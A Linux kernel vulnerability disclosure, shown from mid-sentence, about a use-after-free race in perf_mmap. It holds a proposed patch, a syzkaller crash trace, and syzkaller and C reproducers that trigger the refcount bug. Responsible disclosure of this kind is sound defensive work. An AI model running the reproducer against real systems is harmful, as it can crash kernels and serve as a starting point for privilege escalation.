especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
